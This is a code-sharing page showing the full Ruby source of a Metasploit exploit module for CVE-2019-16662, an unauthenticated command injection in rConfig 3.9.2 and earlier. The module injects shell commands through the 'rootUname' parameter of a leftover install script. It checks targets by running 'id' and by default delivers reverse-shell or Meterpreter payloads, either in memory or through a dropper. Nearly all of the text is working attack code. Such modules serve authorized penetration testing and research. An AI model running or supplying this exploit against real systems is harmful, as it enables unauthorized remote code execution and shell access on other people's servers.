扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'rConfig install Command Execution', 'Description'=> %q{ This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The <code>install</code> directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the <code>ajaxServerSettingsChk.php</code> file as the web server user. This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64). }, 'License'=> MSF_LICENSE, 'Author' => [ 'mhaskar', # Discovery and exploit 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2019-16662'], ['EDB', '47555'], ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'], ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/'] ], 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Payload'=> {'BadChars' => "\x00\x0a\x0d\x26"}, 'Targets'=> [ ['Automatic (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'}, 'Type' => :linux_dropper ] ], 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'DisclosureDate' => '2019-10-28', 'DefaultTarget'=> 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/']) ]) end def check res = execute_command('id') unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 404 vprint_error 'Could not find install directory' return CheckCode::Safe end cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first unless cmd_res return CheckCode::Safe end vprint_status "Response: #{cmd_res}" unless cmd_res.include?('uid=') return CheckCode::Detected end CheckCode::Vulnerable end def execute_command(cmd, opts = {}) vprint_status "Executing command: #{cmd}" send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'), 'vars_get' => {'rootUname' => ";#{cmd} #"} }, 5) end def exploit unless [CheckCode::Detected, CheckCode::Vulnerable].include? check fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable" end case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager(:linemax => 1_500) end end end |
体验盒子
